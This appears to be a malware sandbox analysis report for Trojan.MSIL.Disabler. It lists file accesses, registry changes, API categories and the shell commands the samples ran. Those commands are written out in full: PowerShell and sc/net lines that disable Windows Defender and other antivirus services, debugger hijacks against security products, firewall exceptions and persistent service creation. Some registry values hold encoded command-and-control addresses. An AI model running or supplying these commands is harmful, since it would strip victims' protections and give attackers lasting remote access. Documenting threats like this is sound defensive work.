c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\09b9e928cd9c82b36411a4d793f79e51.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe	Generic Write,Read Attributes,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe	Generic Write,Read Attributes,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe	Generic Write,Read Data,Read Attributes,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\0e75fed00639ea9e725255499292dcdd.exe	Generic Write,Read Data,Read Attributes,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\6a7601a6c8893a57a9f43a5489aa7ae7.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\6a7601a6c8893a57a9f43a5489aa7ae7.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\fc4788cecfc243df96ba2d9ed7c5cd02.exe	Synchronize,Write Attributes
c:\users\user\appdata\roaming\server.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\server.exe	Synchronize,Write Attributes
c:\users\user\appdata\roaming\svchost.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\roaming\svchost.exe	Synchronize,Write Attributes
c:\users\user\downloads\__tmp_rar_sfx_access_check_79765	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\downloads\joliehack.exe	Generic Write,Read Attributes
c:\users\user\downloads\joliehack.exe	Synchronize,Write Attributes
c:\users\user\downloads\tt.pdf	Generic Write,Read Attributes
c:\users\user\downloads\tt.pdf	Synchronize,Write Attributes
c:\windows\appcompat\programs\amcache.hve	Read Data,Read Control,Write Data
c:\windows\appcompat\programs\amcache.hve	Write Attributes
c:\windows\appcompat\programs\amcache.hve.log1	Read Data,Write Data
c:\windows\appcompat\programs\amcache.hve.log2	Read Data,Write Data

Registry Modifications

Key::Value	Data	API Name
HKLM\software\microsoft\tracing\rasapi32::enablefiletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filetracingmask		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::consoletracingmask		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::maxfilesize		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filedirectory	%windir%\tracing	RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enablefiletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing		RegNtPreCreateKey

HKLM\software\microsoft\tracing\rasmancs::filetracingmask		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::consoletracingmask		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::maxfilesize		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filedirectory	%windir%\tracing	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect		RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::failed_count		RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::state		RegNtPreCreateKey
HKCU\software\microsoft\edge\thirdparty::statuscodes	(NULL)	RegNtPreCreateKey
HKCU\software\microsoft\edge\thirdparty::statuscodes		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKCU\software\microsoft\edge\elfbeacon::version	139.0.3405.125	RegNtPreCreateKey
HKCU\software\microsoft\edge\blbeacon::state		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::google updater	C:\Users\Ucibtiup\AppData\Roaming\Microsoft\SysAudio.exe	RegNtPreCreateKey
HKCU\software\6a7601a6c8893a57a9f43a5489aa7ae7::hp	bXVyZGVyMjIyMi0zOTYyNS5wb3J0bWFwLmhvc3Q6Mzk2MjU6Mzk2MjUs	RegNtPreCreateKey
HKCU::di	!	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKCU\environment::see_mask_nozonechecks	1	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	뙧嵖佩ǜ	RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\run::6a7601a6c8893a57a9f43a5489aa7ae7	"C:\Users\Ddavwsbn\AppData\Roaming\svchost.exe" ..	RegNtPreCreateKey
HKCU\software\0e75fed00639ea9e725255499292dcdd::hp	NDUuMTQ1LjQxLjE3ODoyMjIyLA==	RegNtPreCreateKey
HKCU\software\0e75fed00639ea9e725255499292dcdd::i	!	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::0e75fed00639ea9e725255499292dcdd	"C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..	RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\run::0e75fed00639ea9e725255499292dcdd	"C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe" ..	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	놑묉彗ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	똋뱒彗ǜ	RegNtPreCreateKey
HKCU\software\fc4788cecfc243df96ba2d9ed7c5cd02::hp	MTI3LjAuMC4xOjEs	RegNtPreCreateKey
HKCU\software\fc4788cecfc243df96ba2d9ed7c5cd02::i	!	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	點鳿惒ǜ	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\advanced::hidden		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\control panel::cpls	Top level key	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\control panel\cpls::	C:\ProgramData\	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	怜亸肇ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ꬺ黌鴖ǜ	RegNtPreCreateKey
HKCU\software\1d0146db06ff2d2e93b6777d422f7734::us	@	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\runonce::runtimebroker	"C:\Users\Falneayq\AppData\Roaming\Microsoft\Windows\RuntimeBroker.exe"	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	쉓ꖕ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ꖜ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	귾ꖡ옯ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\psuamain.exe::debugger	cmd.exe /c echo	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	宑ꗰ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	艿ꗷ옯ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\psanhost.exe::debugger	cmd.exe /c echo	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ㄱꙆ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	맏ꙏ옯ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\fsma32.exe::debugger	cmd.exe /c echo	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	碇ꛐ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	龦ꛗ옯ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\fshoster.exe::debugger	cmd.exe /c echo	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	㩽꜓옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	慞ꜚ옯ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\masvc.exe::debugger	cmd.exe /c echo	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	샺Ꝛ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	폍ꝭ옯ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\mcshield.exe::debugger	cmd.exe /c echo	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	㏢Ɪ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ᰗꟸ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ꟼ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ࠖꠄ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	醽ꠍ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	噐ꠒ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ⶕ꠪옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	枘ꡄ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	죵ꡥ옯ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\image file execution options\nortonsecurity.exe::debugger	cmd.exe /c echo	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	搷ꢂ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ǵꢟ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	㪨ꢹ옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	䶎꣌옯ǜ	RegNtPreCreateKey
HKLM\software\policies\microsoft\windows defender\spynet::submitsamplesconsent		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	슠꣡옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	⏍꤃옯ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	㙪ꤖ옯ǜ	RegNtPreCreateKey
HKLM\system\software\microsoft\tip\aggregateresults::data	鐄ȴ 鲱惯峟ʏ耀氅歿敹픋˹耀뫹躧픋˹➇ⵌ㭔隞̃耀꧌Ѱ߼	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475	鴂ȁ獖}iꙥ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	聋ǜ	RegNtPreCreateKey
HKCU\local settings\muicache\1b\52c64b7e::@c:\windows\system32\firewallcontrolpanel.dll,-12122	Windows Defender Firewall	RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\run::d72f69dfb2e45fb7b2acbc62f8219a16	"C:\Users\Gvbarzob\AppData\Roaming\svchost.exe" ..	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	喎聛ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475	鴓ȁਪˣ鈯ˣ遙̃豤̃অˣ炑̃濖̃賬̃#獖}偫~엦1਷ˣ邯̃뫯ʃeꙥဈ엦13¶iꙥr$֢vꙥ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	柳縻ǜ	RegNtPreCreateKey
HKLM\software\wow6432node\microsoft\windows\currentversion\run::09b9e928cd9c82b36411a4d793f79e51	"C:\Users\Datfojrd\AppData\Local\Temp\Windows.exe" ..	RegNtPreCreateKey

Windows API Usage

Category	API
Syscall Use	ntdll.dll!NtAccessCheck ntdll.dll!NtAccessCheckByType ntdll.dll!NtAddAtomEx ntdll.dll!NtAdjustPrivilegesToken ntdll.dll!NtAlertThreadByThreadId ntdll.dll!NtAllocateLocallyUniqueId ntdll.dll!NtAlpcAcceptConnectPort ntdll.dll!NtAlpcConnectPort ntdll.dll!NtAlpcConnectPortEx ntdll.dll!NtAlpcCreatePort Show More ntdll.dll!NtAlpcCreatePortSection ntdll.dll!NtAlpcCreateResourceReserve ntdll.dll!NtAlpcCreateSectionView ntdll.dll!NtAlpcCreateSecurityContext ntdll.dll!NtAlpcDeleteSecurityContext ntdll.dll!NtAlpcQueryInformation ntdll.dll!NtAlpcQueryInformationMessage ntdll.dll!NtAlpcSendWaitReceivePort ntdll.dll!NtAlpcSetInformation ntdll.dll!NtApphelpCacheControl ntdll.dll!NtAssociateWaitCompletionPacket ntdll.dll!NtCancelIoFileEx ntdll.dll!NtCancelTimer2 ntdll.dll!NtCancelWaitCompletionPacket ntdll.dll!NtClearEvent ntdll.dll!NtClose ntdll.dll!NtCompareSigningLevels ntdll.dll!NtConnectPort ntdll.dll!NtCreateEvent ntdll.dll!NtCreateFile ntdll.dll!NtCreateIoCompletion ntdll.dll!NtCreateKey ntdll.dll!NtCreateMutant ntdll.dll!NtCreatePrivateNamespace ntdll.dll!NtCreateSection ntdll.dll!NtCreateSemaphore ntdll.dll!NtCreateThreadEx ntdll.dll!NtCreateTimer ntdll.dll!NtCreateTimer2 ntdll.dll!NtCreateUserProcess ntdll.dll!NtCreateWaitCompletionPacket ntdll.dll!NtCreateWorkerFactory ntdll.dll!NtDelayExecution ntdll.dll!NtDeleteValueKey ntdll.dll!NtDeviceIoControlFile ntdll.dll!NtDuplicateObject ntdll.dll!NtDuplicateToken ntdll.dll!NtEnumerateKey ntdll.dll!NtEnumerateValueKey ntdll.dll!NtFlushProcessWriteBuffers ntdll.dll!NtFreeVirtualMemory ntdll.dll!NtFsControlFile ntdll.dll!NtGetCachedSigningLevel ntdll.dll!NtGetCompleteWnfStateSubscription ntdll.dll!NtGetContextThread ntdll.dll!NtGetWriteWatch ntdll.dll!NtImpersonateAnonymousToken ntdll.dll!NtLockFile ntdll.dll!NtMapViewOfSection ntdll.dll!NtNotifyChangeKey ntdll.dll!NtOpenDirectoryObject ntdll.dll!NtOpenEvent ntdll.dll!NtOpenFile ntdll.dll!NtOpenKey ntdll.dll!NtOpenKeyEx ntdll.dll!NtOpenMutant ntdll.dll!NtOpenProcess ntdll.dll!NtOpenProcessToken ntdll.dll!NtOpenProcessTokenEx ntdll.dll!NtOpenSection ntdll.dll!NtOpenSemaphore ntdll.dll!NtOpenSymbolicLinkObject ntdll.dll!NtOpenThread ntdll.dll!NtOpenThreadToken ntdll.dll!NtOpenThreadTokenEx ntdll.dll!NtPowerInformation ntdll.dll!NtProtectVirtualMemory ntdll.dll!NtQueryAttributesFile ntdll.dll!NtQueryDebugFilterState ntdll.dll!NtQueryDefaultLocale ntdll.dll!NtQueryDirectoryFile ntdll.dll!NtQueryDirectoryFileEx ntdll.dll!NtQueryEvent ntdll.dll!NtQueryFullAttributesFile ntdll.dll!NtQueryInformationFile ntdll.dll!NtQueryInformationJobObject ntdll.dll!NtQueryInformationProcess ntdll.dll!NtQueryInformationThread ntdll.dll!NtQueryInformationToken ntdll.dll!NtQueryKey ntdll.dll!NtQueryLicenseValue ntdll.dll!NtQueryObject ntdll.dll!NtQueryPerformanceCounter ntdll.dll!NtQuerySecurityAttributesToken ntdll.dll!NtQuerySecurityObject ntdll.dll!NtQuerySymbolicLinkObject ntdll.dll!NtQuerySystemInformation ntdll.dll!NtQuerySystemInformationEx ntdll.dll!NtQueryValueKey ntdll.dll!NtQueryVirtualMemory 179 additional items are not displayed above.
User Data Access	GetComputerName GetComputerNameEx GetUserDefaultLocaleName GetUserName GetUserNameEx GetUserObjectInformation OpenClipboard
Encryption Used	BCryptOpenAlgorithmProvider CryptAcquireContext
Other Suspicious	AdjustTokenPrivileges SetWindowsHookEx
Anti Debug	CheckRemoteDebuggerPresent IsDebuggerPresent NtQuerySystemInformation OutputDebugString
Network Winsock2	WSAConnect WSASend WSASocket WSAStartup WSAttemptAutodialName
Network Winsock	bind closesocket freeaddrinfo getaddrinfo getpeername inet_addr recv send setsockopt
Network Winhttp	WinHttpOpen
Network Info Queried	GetAdaptersAddresses GetNetworkParams
Process Manipulation Evasion	NtUnmapViewOfSection ReadProcessMemory
Process Shell Execute	CreateProcess ShellExecute ShellExecuteEx WriteConsole
Keyboard Access	GetAsyncKeyState GetKeyState
Service Control	OpenSCManager OpenService
Process Terminate	TerminateProcess
Network Icmp	IcmpCreateFile IcmpSendEcho2

Shell Command Execution


							C:\WINDOWS\system32\fondue.exe "C:\WINDOWS\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll


							C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 944


							(NULL) c:\users\user\downloads\tt.pdf


							(NULL) c:\users\user\downloads\joliehack.exe


							C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 936


									C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 960


									(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\Server.exe


									(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\dis.exe


									(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\3.exe


									(NULL) C:\Users\Ucibtiup\AppData\Local\Temp\1234.exe


									(NULL) C:\Users\Ddavwsbn\AppData\Roaming\svchost.exe


									netsh firewall add allowedprogram "C:\Users\Ddavwsbn\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE


									(NULL) C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe


									netsh firewall add allowedprogram "C:\Users\Iuczgbof\AppData\Local\Temp\Windows Defender Real Time Protection.exe" "Windows Defender Real Time Protection.exe" ENABLE


									(NULL) C:\Users\Qcobdeuv\AppData\Roaming\server.exe


									netsh firewall add allowedprogram "C:\Users\Qcobdeuv\AppData\Roaming\server.exe" "server.exe" ENABLE


									C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 904


									"powershell.exe"


									"C:\Users\Ieqllttt\AppData\Local\Temp\is-JH3NH.tmp\76a38d6844895bc102bf3dc9b87db06b3136c1b0_0009324323.tmp" /SL5="$50376,8477257,886272,c:\users\user\downloads\76a38d6844895bc102bf3dc9b87db06b3136c1b0_0009324323"


									(NULL) C:\Users\Emccwdmp\AppData\Local\Temp\Realtek HD Audio Universal Service.exe


									(NULL) C:\Users\Emccwdmp\AppData\Local\Temp\SAM X222C#.exe


									(NULL) C:\Users\Raratezd\AppData\Local\Temp\winter.bll


									"C:\Users\Falneayq\AppData\Roaming\Microsoft\Windows\RuntimeBroker.exe"


									"C:\Users\Falneayq\AppData\Local\Microsoft\CLR\conhost.exe" --watcher 5744


									"sc" query "WindowsHealthMonitor"


									"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSUAMain.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f


									"powershell" -EP Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableIOAVProtection $true -DisableBehaviorMonitoring $true -DisableScriptScanning $true -DisableBlockAtFirstSeen $true"


									"sc" create "WindowsHealthMonitor" binPath= "C:\Users\Falneayq\AppData\Roaming\Microsoft\Windows\RuntimeBroker.exe" start= auto DisplayName= "Windows System Health Monitor"


									"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f


									WriteConsole: [SC] CreateServi


									"sc" description "WindowsHealthMonitor" "Monitors system health and performance diagnostics."


									"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FSMA32.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f


									WriteConsole: [SC] ChangeServi


									"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fshoster.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f


									"sc" failure "WindowsHealthMonitor" reset= 0 actions= restart/60000/restart/60000/restart/60000


									"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\masvc.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f


									"sc" start "WindowsHealthMonitor"


									"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McShield.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f


									WriteConsole: [SC] StartServic


									"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f


									"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NortonSecurity.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f


									"schtasks" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable


									"sc.exe" stop "WinDefend"


									"schtasks" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable


									"sc.exe" config "WinDefend" start= disabled


									"schtasks" /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable


									"net.exe" stop "WinDefend" /y


									"reg" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f


									"sc.exe" stop "WdNisSvc"


									"sc.exe" config "WdNisSvc" start= disabled


									"net.exe" stop "WdNisSvc" /y


									"sc.exe" stop "SecurityHealthService"


									"sc.exe" config "SecurityHealthService" start= disabled


									"net.exe" stop "SecurityHealthService" /y


									"sc.exe" stop "wscsvc"


									"sc.exe" config "wscsvc" start= disabled


									"net.exe" stop "wscsvc" /y


									"sc.exe" stop "Sense"


									"sc.exe" config "Sense" start= disabled


									WriteConsole: [SC] OpenService


									"reg" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelServiceHost.exe" /v Debugger /t REG_SZ /d "cmd.exe /c echo" /f


									"net.exe" stop "Sense" /y


									"sc.exe" stop "McShield"


									"sc.exe" config "McShield" start= disabled


									"net.exe" stop "McShield" /y


									"reg" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f


									"sc.exe" stop "masvc"


									"sc.exe" config "masvc" start= disabled


									"reg" QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid


									C:\Windows\Microsoft.NET\Framework\v2.0.50727\\dw20.exe dw20.exe -x -s 932


									(NULL) C:\Users\Gvbarzob\AppData\Roaming\svchost.exe


									netsh firewall add allowedprogram "C:\Users\Gvbarzob\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE


									(NULL) C:\Users\Datfojrd\AppData\Local\Temp\Windows.exe


									netsh firewall add allowedprogram "C:\Users\Datfojrd\AppData\Local\Temp\Windows.exe" "Windows.exe" ENABLE

Trojan.MSIL.Disabler

Threat Scorecard

EnigmaSoft Threat Scorecard

Analysis Report

General information

Known Samples

Known Samples

Windows Portable Executable Attributes

Windows Portable Executable Attributes

File Icons

File Icons

